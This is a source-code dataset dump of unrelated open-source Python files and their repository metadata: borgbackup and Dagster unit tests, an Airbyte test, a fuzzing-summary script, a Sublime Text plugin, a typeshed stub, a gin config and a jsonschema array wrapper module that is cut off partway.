"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
borgbackup/borg
|
c83f2a34e8bcc19859e9696a9425cbf4e23a743c
|
4ded3620c5e9cd930d2e07e912af6c894abe6d5d
|
refs/heads/master
| 2023-09-03T20:36:44.300124
| 2023-09-03T18:49:50
| 2023-09-03T18:49:50
| 35,517,126
| 10,379
| 1,053
|
NOASSERTION
| 2023-09-14T21:52:33
| 2015-05-12T23:10:47
|
Python
|
UTF-8
|
Python
| false
| false
| 12,951
|
py
|
archive.py
|
import json
import os
from collections import OrderedDict
from datetime import datetime, timezone
from io import StringIO
from unittest.mock import Mock
import pytest
from . import rejected_dotdot_paths
from ..crypto.key import PlaintextKey
from ..archive import Archive, CacheChunkBuffer, RobustUnpacker, valid_msgpacked_dict, ITEM_KEYS, Statistics
from ..archive import BackupOSError, backup_io, backup_io_iter, get_item_uid_gid
from ..helpers import msgpack
from ..item import Item, ArchiveItem
from ..manifest import Manifest
from ..platform import uid2user, gid2group, is_win32
@pytest.fixture()
def stats():
stats = Statistics()
stats.update(20, unique=True)
stats.nfiles = 1
return stats
def test_stats_basic(stats):
assert stats.osize == 20
assert stats.usize == 20
stats.update(20, unique=False)
assert stats.osize == 40
assert stats.usize == 20
@pytest.mark.parametrize(
"item_path, update_size, expected_output",
[
("", 0, "20 B O 20 B U 1 N "), # test unchanged 'stats' fixture
("foo", 10**3, "1.02 kB O 20 B U 1 N foo"), # test updated original size and set item path
# test long item path which exceeds 80 characters
("foo" * 40, 10**3, "1.02 kB O 20 B U 1 N foofoofoofoofoofoofoofoofo...foofoofoofoofoofoofoofoofoofoo"),
],
)
def test_stats_progress(item_path, update_size, expected_output, stats, monkeypatch, columns=80):
monkeypatch.setenv("COLUMNS", str(columns))
out = StringIO()
item = Item(path=item_path) if item_path else None
s = expected_output
stats.update(update_size, unique=False)
stats.show_progress(item=item, stream=out)
buf = " " * (columns - len(s))
assert out.getvalue() == s + buf + "\r"
def test_stats_format(stats):
assert (
str(stats)
== """\
Number of files: 1
Original size: 20 B
Deduplicated size: 20 B
Time spent in hashing: 0.00 seconds
Time spent in chunking: 0.00 seconds
Added files: 0
Unchanged files: 0
Modified files: 0
Error files: 0
Files changed while reading: 0
Bytes read from remote: 0
Bytes sent to remote: 0
"""
)
s = f"{stats.osize_fmt}"
assert s == "20 B"
# kind of redundant, but id is variable so we can't match reliably
assert repr(stats) == f"<Statistics object at {id(stats):#x} (20, 20)>"
def test_stats_progress_json(stats):
stats.output_json = True
out = StringIO()
stats.show_progress(item=Item(path="foo"), stream=out)
result = json.loads(out.getvalue())
assert result["type"] == "archive_progress"
assert isinstance(result["time"], float)
assert result["finished"] is False
assert result["path"] == "foo"
assert result["original_size"] == 20
assert result["nfiles"] == 1
out = StringIO()
stats.show_progress(stream=out, final=True)
result = json.loads(out.getvalue())
assert result["type"] == "archive_progress"
assert isinstance(result["time"], float)
assert result["finished"] is True # see #6570
assert "path" not in result
assert "original_size" not in result
assert "nfiles" not in result
@pytest.mark.parametrize(
"isoformat, expected",
[
("1970-01-01T00:00:01.000001", datetime(1970, 1, 1, 0, 0, 1, 1, timezone.utc)), # test with microseconds
("1970-01-01T00:00:01", datetime(1970, 1, 1, 0, 0, 1, 0, timezone.utc)), # test without microseconds
],
)
def test_timestamp_parsing(monkeypatch, isoformat, expected):
repository = Mock()
key = PlaintextKey(repository)
manifest = Manifest(key, repository)
a = Archive(manifest, "test", create=True)
a.metadata = ArchiveItem(time=isoformat)
assert a.ts == expected
class MockCache:
class MockRepo:
def async_response(self, wait=True):
pass
def __init__(self):
self.objects = {}
self.repository = self.MockRepo()
def add_chunk(self, id, meta, data, stats=None, wait=True):
self.objects[id] = data
return id, len(data)
def test_cache_chunk_buffer():
data = [Item(path="p1"), Item(path="p2")]
cache = MockCache()
key = PlaintextKey(None)
chunks = CacheChunkBuffer(cache, key, None)
for d in data:
chunks.add(d)
chunks.flush()
chunks.flush(flush=True)
assert len(chunks.chunks) == 2
unpacker = msgpack.Unpacker()
for id in chunks.chunks:
unpacker.feed(cache.objects[id])
assert data == [Item(internal_dict=d) for d in unpacker]
def test_partial_cache_chunk_buffer():
big = "0123456789abcdefghijklmnopqrstuvwxyz" * 25000
data = [Item(path="full", target=big), Item(path="partial", target=big)]
cache = MockCache()
key = PlaintextKey(None)
chunks = CacheChunkBuffer(cache, key, None)
for d in data:
chunks.add(d)
chunks.flush(flush=False)
# the code is expected to leave the last partial chunk in the buffer
assert len(chunks.chunks) == 3
assert chunks.buffer.tell() > 0
# now really flush
chunks.flush(flush=True)
assert len(chunks.chunks) == 4
assert chunks.buffer.tell() == 0
unpacker = msgpack.Unpacker()
for id in chunks.chunks:
unpacker.feed(cache.objects[id])
assert data == [Item(internal_dict=d) for d in unpacker]
def make_chunks(items):
return b"".join(msgpack.packb({"path": item}) for item in items)
def _validator(value):
return isinstance(value, dict) and value.get("path") in ("foo", "bar", "boo", "baz")
def process(input):
unpacker = RobustUnpacker(validator=_validator, item_keys=ITEM_KEYS)
result = []
for should_sync, chunks in input:
if should_sync:
unpacker.resync()
for data in chunks:
unpacker.feed(data)
for item in unpacker:
result.append(item)
return result
def test_extra_garbage_no_sync():
chunks = [(False, [make_chunks(["foo", "bar"])]), (False, [b"garbage"] + [make_chunks(["boo", "baz"])])]
res = process(chunks)
assert res == [{"path": "foo"}, {"path": "bar"}, 103, 97, 114, 98, 97, 103, 101, {"path": "boo"}, {"path": "baz"}]
def split(left, length):
parts = []
while left:
parts.append(left[:length])
left = left[length:]
return parts
def test_correct_stream():
chunks = split(make_chunks(["foo", "bar", "boo", "baz"]), 2)
input = [(False, chunks)]
result = process(input)
assert result == [{"path": "foo"}, {"path": "bar"}, {"path": "boo"}, {"path": "baz"}]
def test_missing_chunk():
chunks = split(make_chunks(["foo", "bar", "boo", "baz"]), 4)
input = [(False, chunks[:3]), (True, chunks[4:])]
result = process(input)
assert result == [{"path": "foo"}, {"path": "boo"}, {"path": "baz"}]
def test_corrupt_chunk():
chunks = split(make_chunks(["foo", "bar", "boo", "baz"]), 4)
input = [(False, chunks[:3]), (True, [b"gar", b"bage"] + chunks[3:])]
result = process(input)
assert result == [{"path": "foo"}, {"path": "boo"}, {"path": "baz"}]
@pytest.fixture
def item_keys_serialized():
return [msgpack.packb(name) for name in ITEM_KEYS]
@pytest.mark.parametrize(
"packed",
[b"", b"x", b"foobar"]
+ [
msgpack.packb(o)
for o in (
[None, 0, 0.0, False, "", {}, [], ()]
+ [42, 23.42, True, b"foobar", {b"foo": b"bar"}, [b"foo", b"bar"], (b"foo", b"bar")]
)
],
)
def test_invalid_msgpacked_item(packed, item_keys_serialized):
assert not valid_msgpacked_dict(packed, item_keys_serialized)
# pytest-xdist requires always same order for the keys and dicts:
IK = sorted(list(ITEM_KEYS))
@pytest.mark.parametrize(
"packed",
[
msgpack.packb(o)
for o in [
{"path": b"/a/b/c"}, # small (different msgpack mapping type!)
OrderedDict((k, b"") for k in IK), # as big (key count) as it gets
OrderedDict((k, b"x" * 1000) for k in IK), # as big (key count and volume) as it gets
]
],
ids=["minimal", "empty-values", "long-values"],
)
def test_valid_msgpacked_items(packed, item_keys_serialized):
assert valid_msgpacked_dict(packed, item_keys_serialized)
def test_key_length_msgpacked_items():
key = "x" * 32 # 31 bytes is the limit for fixstr msgpack type
data = {key: b""}
item_keys_serialized = [msgpack.packb(key)]
assert valid_msgpacked_dict(msgpack.packb(data), item_keys_serialized)
def test_backup_io():
with pytest.raises(BackupOSError):
with backup_io:
raise OSError(123)
def test_backup_io_iter():
class Iterator:
def __init__(self, exc):
self.exc = exc
def __next__(self):
raise self.exc()
oserror_iterator = Iterator(OSError)
with pytest.raises(BackupOSError):
for _ in backup_io_iter(oserror_iterator):
pass
normal_iterator = Iterator(StopIteration)
for _ in backup_io_iter(normal_iterator):
assert False, "StopIteration handled incorrectly"
def test_get_item_uid_gid():
# test requires that:
# - a user/group name for the current process' real uid/gid exists.
# - a system user/group udoesnotexist:gdoesnotexist does NOT exist.
try:
puid, pgid = os.getuid(), os.getgid() # UNIX only
except AttributeError:
puid, pgid = 0, 0
puser, pgroup = uid2user(puid), gid2group(pgid)
# this is intentionally a "strange" item, with not matching ids/names.
item = Item(path="filename", uid=1, gid=2, user=puser, group=pgroup)
uid, gid = get_item_uid_gid(item, numeric=False)
# these are found via a name-to-id lookup
assert uid == puid
assert gid == pgid
uid, gid = get_item_uid_gid(item, numeric=True)
# these are directly taken from the item.uid and .gid
assert uid == 1
assert gid == 2
uid, gid = get_item_uid_gid(item, numeric=False, uid_forced=3, gid_forced=4)
# these are enforced (not from item metadata)
assert uid == 3
assert gid == 4
# item metadata broken, has negative ids.
item = Item(path="filename", uid=-1, gid=-2, user=puser, group=pgroup)
uid, gid = get_item_uid_gid(item, numeric=True)
# use the uid/gid defaults (which both default to 0).
assert uid == 0
assert gid == 0
uid, gid = get_item_uid_gid(item, numeric=True, uid_default=5, gid_default=6)
# use the uid/gid defaults (as given).
assert uid == 5
assert gid == 6
# item metadata broken, has negative ids and non-existing user/group names.
item = Item(path="filename", uid=-3, gid=-4, user="udoesnotexist", group="gdoesnotexist")
uid, gid = get_item_uid_gid(item, numeric=False)
# use the uid/gid defaults (which both default to 0).
assert uid == 0
assert gid == 0
uid, gid = get_item_uid_gid(item, numeric=True, uid_default=7, gid_default=8)
# use the uid/gid defaults (as given).
assert uid == 7
assert gid == 8
if not is_win32:
# due to the hack in borg.platform.windows user2uid / group2gid, these always return 0
# (no matter which username we ask for) and they never raise a KeyError (like e.g. for
# a non-existing user/group name). Thus, these tests can currently not succeed on win32.
# item metadata has valid uid/gid, but non-existing user/group names.
item = Item(path="filename", uid=9, gid=10, user="udoesnotexist", group="gdoesnotexist")
uid, gid = get_item_uid_gid(item, numeric=False)
# because user/group name does not exist here, use valid numeric ids from item metadata.
assert uid == 9
assert gid == 10
uid, gid = get_item_uid_gid(item, numeric=False, uid_default=11, gid_default=12)
# because item uid/gid seems valid, do not use the given uid/gid defaults
assert uid == 9
assert gid == 10
# item metadata only has uid/gid, but no user/group.
item = Item(path="filename", uid=13, gid=14)
uid, gid = get_item_uid_gid(item, numeric=False)
# it'll check user/group first, but as there is nothing in the item, falls back to uid/gid.
assert uid == 13
assert gid == 14
uid, gid = get_item_uid_gid(item, numeric=True)
# does not check user/group, directly returns uid/gid.
assert uid == 13
assert gid == 14
# item metadata has no uid/gid/user/group.
item = Item(path="filename")
uid, gid = get_item_uid_gid(item, numeric=False, uid_default=15)
# as there is nothing, it'll fall back to uid_default/gid_default.
assert uid == 15
assert gid == 0
uid, gid = get_item_uid_gid(item, numeric=True, gid_default=16)
# as there is nothing, it'll fall back to uid_default/gid_default.
assert uid == 0
assert gid == 16
def test_reject_non_sanitized_item():
for path in rejected_dotdot_paths:
with pytest.raises(ValueError, match="unexpected '..' element in path"):
Item(path=path, user="root", group="root")
|
1c6036a8c822d3049d4f9342569a7cd71678e939
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/dts/airbyte/airbyte-cdk/python/unit_tests/sources/utils/test_record_helper.py
|
7f3d535ce05d1eb691b82bfcb9d468a32e324c47
|
[
"MIT",
"Elastic-2.0",
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 2,653
|
py
|
test_record_helper.py
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from unittest.mock import MagicMock
import pytest
from airbyte_cdk.models import (
AirbyteLogMessage,
AirbyteMessage,
AirbyteRecordMessage,
AirbyteStateMessage,
AirbyteStateType,
AirbyteTraceMessage,
Level,
TraceType,
)
from airbyte_cdk.models import Type as MessageType
from airbyte_cdk.sources.utils.record_helper import stream_data_to_airbyte_message
NOW = 1234567
STREAM_NAME = "my_stream"
@pytest.mark.parametrize(
"test_name, data, expected_message",
[
(
"test_data_to_airbyte_record",
{"id": 0, "field_A": 1.0, "field_B": "airbyte"},
AirbyteMessage(
type=MessageType.RECORD,
record=AirbyteRecordMessage(stream="my_stream", data={"id": 0, "field_A": 1.0, "field_B": "airbyte"}, emitted_at=NOW),
),
),
],
)
def test_data_or_record_to_airbyte_record(test_name, data, expected_message):
transformer = MagicMock()
schema = {}
message = stream_data_to_airbyte_message(STREAM_NAME, data, transformer, schema)
message.record.emitted_at = NOW
if isinstance(data, dict):
transformer.transform.assert_called_with(data, schema)
else:
assert not transformer.transform.called
assert expected_message == message
@pytest.mark.parametrize(
"test_name, data, expected_message",
[
(
"test_log_message_to_airbyte_record",
AirbyteLogMessage(level=Level.INFO, message="Hello, this is a log message"),
AirbyteMessage(type=MessageType.LOG, log=AirbyteLogMessage(level=Level.INFO, message="Hello, this is a log message")),
),
(
"test_trace_message_to_airbyte_record",
AirbyteTraceMessage(type=TraceType.ERROR, emitted_at=101),
AirbyteMessage(type=MessageType.TRACE, trace=AirbyteTraceMessage(type=TraceType.ERROR, emitted_at=101)),
),
],
)
def test_log_or_trace_to_message(test_name, data, expected_message):
transformer = MagicMock()
schema = {}
message = stream_data_to_airbyte_message(STREAM_NAME, data, transformer, schema)
assert not transformer.transform.called
assert expected_message == message
@pytest.mark.parametrize(
"test_name, data",
[
("test_log_message_to_airbyte_record", AirbyteStateMessage(type=AirbyteStateType.STREAM)),
],
)
def test_state_message_to_message(test_name, data):
transformer = MagicMock()
schema = {}
with pytest.raises(ValueError):
stream_data_to_airbyte_message(STREAM_NAME, data, transformer, schema)
|
a1fdc2ed664e844db7261ec1502132a530d6496e
|
daa60221ed36dc8e20dd0a2a96521ffa2bdc94c5
|
/simics/bin/fuzz-summary.py
|
84ff2db9203bba8d6ebbf0c57382ed45bef781bb
|
[
"BSD-2-Clause"
] |
permissive
|
mfthomps/RESim
|
7dbddc1d46653c0443dec9c7930517753bbe5e78
|
cc83ed799cd37934e1659e1d20abf6c36449e0bf
|
refs/heads/master
| 2023-08-10T04:27:36.365806
| 2023-06-29T15:22:55
| 2023-06-29T15:22:55
| 183,653,459
| 160
| 30
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,021
|
py
|
fuzz-summary.py
|
#!/usr/bin/env python
#
# given a an AFL session named by target, provide a summary of
# queue files and unique hits files (post playAFL).
#
import sys
import os
import glob
import json
import argparse
import subprocess
try:
import ConfigParser
except:
import configparser as ConfigParser
resim_dir = os.getenv('RESIM_DIR')
sys.path.append(os.path.join(resim_dir, 'simics', 'monitorCore'))
import aflPath
def main():
afldir = os.getenv('AFL_DIR')
parser = argparse.ArgumentParser(prog='fuzz-summary.py', description='Show fuzzing summary')
parser.add_argument('target', action='store', help='The target workspace name.')
args = parser.parse_args()
unique_files = aflPath.getTargetQueue(args.target)
queue_files = aflPath.getTargetQueue(args.target, get_all=True)
print('AFL found %d queue files (execution paths), some may be duplicates.' % len(queue_files))
print('RESim sees %d unique execution paths.' % len(unique_files))
if __name__ == '__main__':
sys.exit(main())
|
bba2c9bf06ec3c24289a6642a593ae334ae68888
|
21feee298109acce95e02a46747b29e61afb4b8a
|
/php_companion/commands/goto_definition_scope.py
|
08441d7365399b06e85bddcfbb642397e954b0d2
|
[
"MIT"
] |
permissive
|
erichard/SublimePHPCompanion
|
d41abf45a4e293b5e409d33c9c40dfa622a7a9d4
|
59888a057667c90b8c346509eea6bf2e096a7791
|
refs/heads/main
| 2023-07-30T05:24:11.962026
| 2022-06-23T15:39:31
| 2022-06-23T15:39:31
| 8,742,601
| 1,001
| 169
|
MIT
| 2022-06-23T15:39:33
| 2013-03-13T01:36:45
|
Python
|
UTF-8
|
Python
| false
| false
| 1,183
|
py
|
goto_definition_scope.py
|
import sublime
import sublime_plugin
import re
class GotoDefinitionScopeCommand(sublime_plugin.TextCommand):
def run(self, edit):
run = GTDRun(self.view, self.view.window())
run.do()
class GTDRun:
def __init__(self, view, window):
self.view = view
self.window = window
self.selected_region = self.view.word(self.view.sel()[0])
def do(self):
if self.in_class_scope():
selected_str = self.view.substr(self.selected_region)
for symbol in self.view.symbols():
if symbol[1] == selected_str:
self.view.sel().clear()
self.view.sel().add(symbol[0])
self.view.show(symbol[0])
return
# falls back to the original functionality
self.window.run_command("goto_definition")
def in_class_scope(self):
selected_point = self.selected_region.begin()
# the search area is 60 pts wide, maybe it is not enough
search_str = self.view.substr(sublime.Region(selected_point - 60,selected_point))
return re.search("(\$this->|self::|static::)(\s)*$", search_str) != None
|
91f2f03f79e1d23a183243fccf19dab7ae7e2cc2
|
ec85250addb7357dfe7bb3e0680d53fc7b0fd8fb
|
/python_modules/dagster/dagster_tests/general_tests/test_repository.py
|
1d6c5a70c3e9dd926162b11dfe28d6aaee6891ab
|
[
"Apache-2.0"
] |
permissive
|
dagster-io/dagster
|
6adb5deee8bcf3ea1866a6a64f2ed81e1db5e73a
|
fe21995e0402878437a828c6a4244025eac8c43b
|
refs/heads/master
| 2023-09-05T20:46:08.203794
| 2023-09-05T19:54:52
| 2023-09-05T19:54:52
| 131,619,646
| 8,565
| 1,154
|
Apache-2.0
| 2023-09-14T21:57:37
| 2018-04-30T16:30:04
|
Python
|
UTF-8
|
Python
| false
| false
| 5,588
|
py
|
test_repository.py
|
"""Repository of test jobs.
"""
import pytest
from dagster import (
AssetKey,
GraphDefinition,
Int,
IntMetadataValue,
IOManager,
JobDefinition,
TextMetadataValue,
asset,
graph,
io_manager,
job,
multiprocess_executor,
op,
repository,
resource,
with_resources,
)
from dagster._check import CheckError
def define_empty_job():
return JobDefinition(name="empty_job", graph_def=GraphDefinition(name="empty_graph"))
def define_simple_job():
@op
def return_two():
return 2
@job
def simple_job():
return_two()
return simple_job
def define_with_resources_job():
@resource(config_schema=Int)
def adder_resource(init_context):
return lambda x: x + init_context.resource_config
@resource(config_schema=Int)
def multer_resource(init_context):
return lambda x: x * init_context.resource_config
@resource(config_schema={"num_one": Int, "num_two": Int})
def double_adder_resource(init_context):
return (
lambda x: x
+ init_context.resource_config["num_one"]
+ init_context.resource_config["num_two"]
)
@op(required_resource_keys={"modifier"})
def apply_to_three(context):
return context.resources.modifier(3)
@graph
def my_graph():
apply_to_three()
adder_job = my_graph.to_job(name="adder_job", resource_defs={"modifier": adder_resource})
multer_job = my_graph.to_job(name="multer_job", resource_defs={"modifier": multer_resource})
double_adder_job = my_graph.to_job(
name="double_adder_job", resource_defs={"modifier": double_adder_resource}
)
multi_job = my_graph.to_job(
"multi_job", resource_defs={"modifier": adder_resource}, executor_def=multiprocess_executor
)
return [adder_job, multer_job, double_adder_job, multi_job]
@repository
def dagster_test_repository():
return [
define_empty_job(),
define_simple_job(),
*define_with_resources_job(),
]
def test_repository_construction():
assert dagster_test_repository
@repository(metadata={"string": "foo", "integer": 123})
def metadata_repository():
return []
def test_repository_metadata():
assert metadata_repository.metadata == {
"string": TextMetadataValue("foo"),
"integer": IntMetadataValue(123),
}
@repository
def empty_repository():
return []
def test_invalid_repository():
with pytest.raises(CheckError):
@repository
def invalid_repository(_invalid_arg: str):
return []
def test_asset_value_loader():
class MyIOManager(IOManager):
def handle_output(self, context, obj):
assert False
def load_input(self, context):
return 5
@io_manager()
def my_io_manager():
return MyIOManager()
@asset
def asset1():
...
@repository
def repo():
return with_resources([asset1], resource_defs={"io_manager": my_io_manager})
value = repo.load_asset_value(AssetKey("asset1"))
assert value == 5
def test_asset_value_loader_with_config():
class MyIOManager(IOManager):
def __init__(self, key):
self.key = key
def handle_output(self, context, obj):
assert False
def load_input(self, context):
return self.key
@io_manager(config_schema={"key": int})
def my_io_manager(context):
return MyIOManager(context.resource_config["key"])
@asset
def asset1():
...
@repository
def repo():
return with_resources([asset1], resource_defs={"io_manager": my_io_manager})
resource_config = {"io_manager": {"config": {"key": 5}}}
value = repo.load_asset_value(AssetKey("asset1"), resource_config=resource_config)
assert value == 5
def test_asset_value_loader_with_resources():
@resource(config_schema={"key": int})
def io_resource(context):
return context.resource_config["key"]
class MyIOManager(IOManager):
def handle_output(self, context, obj):
assert False
def load_input(self, context):
return context.resources.io_resource
@io_manager(required_resource_keys={"io_resource"})
def my_io_manager():
return MyIOManager()
@asset
def asset1():
...
@repository
def repo():
return with_resources(
[asset1], resource_defs={"io_manager": my_io_manager, "io_resource": io_resource}
)
resource_config = {"io_resource": {"config": {"key": 5}}}
value = repo.load_asset_value(AssetKey("asset1"), resource_config=resource_config)
assert value == 5
def test_asset_value_loader_with_metadata():
class MyIOManager(IOManager):
def handle_output(self, context, obj):
assert False
def load_input(self, context):
assert context.metadata is not None
return context.metadata.get("return") or 5
@io_manager()
def my_io_manager():
return MyIOManager()
@asset
def asset1():
...
@asset(metadata={"return": 20})
def asset2():
...
@repository
def repo():
return with_resources([asset1, asset2], resource_defs={"io_manager": my_io_manager})
value = repo.load_asset_value(AssetKey("asset1"))
assert value == 5
value = repo.load_asset_value(AssetKey("asset1"), metadata={"return": 10})
assert value == 10
value = repo.load_asset_value(AssetKey("asset2"))
assert value == 5
|
1e3f3005b85cca4dc63e700b146998078079fa37
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/helpers/typeshed/stdlib/@python2/StringIO.pyi
|
4aa0cb3fcd5a5420f7756340a7345690ca477bd4
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 1,127
|
pyi
|
StringIO.pyi
|
from typing import IO, Any, AnyStr, Generic, Iterable, Iterator
class StringIO(IO[AnyStr], Generic[AnyStr]):
closed: bool
softspace: int
len: int
name: str
def __init__(self, buf: AnyStr = ...) -> None: ...
def __iter__(self) -> Iterator[AnyStr]: ...
def next(self) -> AnyStr: ...
def close(self) -> None: ...
def isatty(self) -> bool: ...
def seek(self, pos: int, mode: int = ...) -> int: ...
def tell(self) -> int: ...
def read(self, n: int = ...) -> AnyStr: ...
def readline(self, length: int = ...) -> AnyStr: ...
def readlines(self, sizehint: int = ...) -> list[AnyStr]: ...
def truncate(self, size: int | None = ...) -> int: ...
def write(self, s: AnyStr) -> int: ...
def writelines(self, iterable: Iterable[AnyStr]) -> None: ...
def flush(self) -> None: ...
def getvalue(self) -> AnyStr: ...
def __enter__(self) -> Any: ...
def __exit__(self, type: Any, value: Any, traceback: Any) -> Any: ...
def fileno(self) -> int: ...
def readable(self) -> bool: ...
def seekable(self) -> bool: ...
def writable(self) -> bool: ...
|
30dc7a9e9fcb5c6f047317f7f1456131c01a3095
|
c56f70ff9e593118ada1f188e79b0f3015f91f24
|
/mesh_tensorflow/transformer/gin/layouts/single.gin
|
d7191c769634d1bafc94deec778a3dbb29e2f69f
|
[
"Apache-2.0"
] |
permissive
|
tensorflow/mesh
|
44f567ec4d5fa0db58f1a41b818702603d781c64
|
fbf7b1e547e8b8cb134e81e1cd350c312c0b5a16
|
refs/heads/master
| 2023-08-15T09:18:33.205493
| 2023-05-16T13:01:43
| 2023-05-16T13:01:43
| 149,666,254
| 1,508
| 290
|
Apache-2.0
| 2023-05-16T13:01:48
| 2018-09-20T20:23:34
|
Python
|
UTF-8
|
Python
| false
| false
| 192
|
gin
|
single.gin
|
# -*-Python-*-
utils.run.layout_rules = ""
utils.run.mesh_shape = ""
# This is likely a CPU, which can not handle bfloat16 activations.
utils.get_variable_dtype.activation_dtype = "float32"
|
3971d6de593d478ec8180abc571d1fa0429addb0
|
b097bc2fba0629d592d76d9c7649d9a62789afb6
|
/python_jsonschema_objects/wrapper_types.py
|
c3af3f06f2f34d9cc2da6d752574c450a0d3ac65
|
[
"MIT"
] |
permissive
|
cwacek/python-jsonschema-objects
|
d91bb4d6c69fffcc24f45f33e05174a627293449
|
2a5aeb29a953cff3d4fd82f19c0d46342af1da36
|
refs/heads/master
| 2023-09-01T11:49:43.767991
| 2023-08-17T01:37:45
| 2023-08-17T01:37:45
| 18,216,839
| 356
| 113
|
MIT
| 2023-09-14T01:56:32
| 2014-03-28T15:29:21
|
Python
|
UTF-8
|
Python
| false
| false
| 11,519
|
py
|
wrapper_types.py
|
import collections
import logging
import six
from python_jsonschema_objects import util
from python_jsonschema_objects.validators import registry, ValidationError
from python_jsonschema_objects.util import lazy_format as fmt
logger = logging.getLogger(__name__)
class ArrayWrapper(collections.abc.MutableSequence):
"""A wrapper for array-like structures.
This implements all of the array like behavior that one would want,
with a dirty-tracking mechanism to avoid constant validation costs.
"""
@property
def strict(self):
return getattr(self, "_strict_", False)
def __len__(self):
return len(self.data)
def mark_or_revalidate(self):
if self.strict:
self.validate()
else:
self._dirty = True
def __delitem__(self, index):
self.data.pop(index)
self.mark_or_revalidate()
def insert(self, index, value):
self.data.insert(index, value)
self.mark_or_revalidate()
def __setitem__(self, index, value):
self.data[index] = value
self.mark_or_revalidate()
def __getitem__(self, idx):
return self.typed_elems[idx]
def __eq__(self, other):
if isinstance(other, ArrayWrapper):
return self.for_json() == other.for_json()
else:
return self.for_json() == other
def __init__(self, ary):
"""Initialize a wrapper for the array
Args:
ary: (list-like, or ArrayWrapper)
"""
""" Marks whether or not the underlying array has been modified """
self._dirty = True
""" Holds a typed copy of the array """
self._typed = None
if isinstance(ary, (list, tuple, collections.abc.Sequence)):
self.data = ary
else:
raise TypeError("Invalid value given to array validator: {0}".format(ary))
logger.debug(fmt("Initializing ArrayWrapper {} with {}", self, ary))
@property
def typed_elems(self):
logger.debug(fmt("Accessing typed_elems of ArrayWrapper {} ", self))
if self._typed is None or self._dirty is True:
self.validate()
return self._typed
def __repr__(self):
return "<%s=%s>" % (self.__class__.__name__, str(self.data))
@classmethod
def from_json(cls, jsonmsg):
import json
msg = json.loads(jsonmsg)
obj = cls(msg)
obj.validate()
return obj
def serialize(self):
enc = util.ProtocolJSONEncoder()
return enc.encode(self.typed_elems)
def for_json(self):
from python_jsonschema_objects import classbuilder
out = []
for item in self.typed_elems:
if isinstance(
item,
(classbuilder.ProtocolBase, classbuilder.LiteralValue, ArrayWrapper),
):
out.append(item.for_json())
else:
out.append(item)
return out
def validate(self):
if self.strict or self._dirty:
self.validate_items()
self.validate_length()
self.validate_uniqueness()
return True
def validate_uniqueness(self):
if getattr(self, "uniqueItems", False) is True:
testset = set(repr(item) for item in self.data)
if len(testset) != len(self.data):
raise ValidationError(
"{0} has duplicate elements, but uniqueness required".format(
self.data
)
)
def validate_length(self):
if getattr(self, "minItems", None) is not None:
if len(self.data) < self.minItems:
raise ValidationError(
"{1} has too few elements. Wanted {0}.".format(
self.minItems, self.data
)
)
if getattr(self, "maxItems", None) is not None:
if len(self.data) > self.maxItems:
raise ValidationError(
"{1} has too many elements. Wanted {0}.".format(
self.maxItems, self.data
)
)
def validate_items(self):
"""Validates the items in the backing array, including
performing type validation.
Sets the _typed property and clears the dirty flag as a side effect
Returns:
The typed array
"""
logger.debug(fmt("Validating {}", self))
from python_jsonschema_objects import classbuilder
if self.__itemtype__ is None:
return
type_checks = self.__itemtype__
if not isinstance(type_checks, (tuple, list)):
# we were given items = {'type': 'blah'} ; thus ensure the type for all data.
type_checks = [type_checks] * len(self.data)
elif len(type_checks) > len(self.data):
raise ValidationError(
"{1} does not have sufficient elements to validate against {0}".format(
self.__itemtype__, self.data
)
)
typed_elems = []
for elem, typ in zip(self.data, type_checks):
if isinstance(typ, dict):
for param, paramval in six.iteritems(typ):
validator = registry(param)
if validator is not None:
validator(paramval, elem, typ)
typed_elems.append(elem)
elif util.safe_issubclass(typ, classbuilder.LiteralValue):
val = typ(elem)
val.validate()
typed_elems.append(val)
elif util.safe_issubclass(typ, classbuilder.ProtocolBase):
if not isinstance(elem, typ):
try:
if isinstance(
elem, (six.string_types, six.integer_types, float)
):
val = typ(elem)
else:
val = typ(**util.coerce_for_expansion(elem))
except TypeError as e:
raise ValidationError(
"'{0}' is not a valid value for '{1}': {2}".format(
elem, typ, e
)
)
else:
val = elem
val.validate()
typed_elems.append(val)
elif util.safe_issubclass(typ, ArrayWrapper):
val = typ(elem)
val.validate()
typed_elems.append(val)
elif isinstance(typ, (classbuilder.TypeProxy, classbuilder.TypeRef)):
try:
if isinstance(elem, (six.string_types, six.integer_types, float)):
val = typ(elem)
else:
val = typ(**util.coerce_for_expansion(elem))
except TypeError as e:
raise ValidationError(
"'{0}' is not a valid value for '{1}': {2}".format(elem, typ, e)
)
else:
val.validate()
typed_elems.append(val)
self._dirty = False
self._typed = typed_elems
return typed_elems
@staticmethod
def create(name, item_constraint=None, **addl_constraints):
"""Create an array validator based on the passed in constraints.
If item_constraint is a tuple, it is assumed that tuple validation
is being performed. If it is a class or dictionary, list validation
will be performed. Classes are assumed to be subclasses of ProtocolBase,
while dictionaries are expected to be basic types ('string', 'number', ...).
addl_constraints is expected to be key-value pairs of any of the other
constraints permitted by JSON Schema v4.
"""
logger.debug(
fmt(
"Constructing ArrayValidator with {} and {}",
item_constraint,
addl_constraints,
)
)
from python_jsonschema_objects import classbuilder
klassbuilder = addl_constraints.pop(
"classbuilder", None
) # type: python_jsonschema_objects.classbuilder.ClassBuilder
props = {}
if item_constraint is not None:
if isinstance(item_constraint, (tuple, list)):
for i, elem in enumerate(item_constraint):
isdict = isinstance(elem, (dict,))
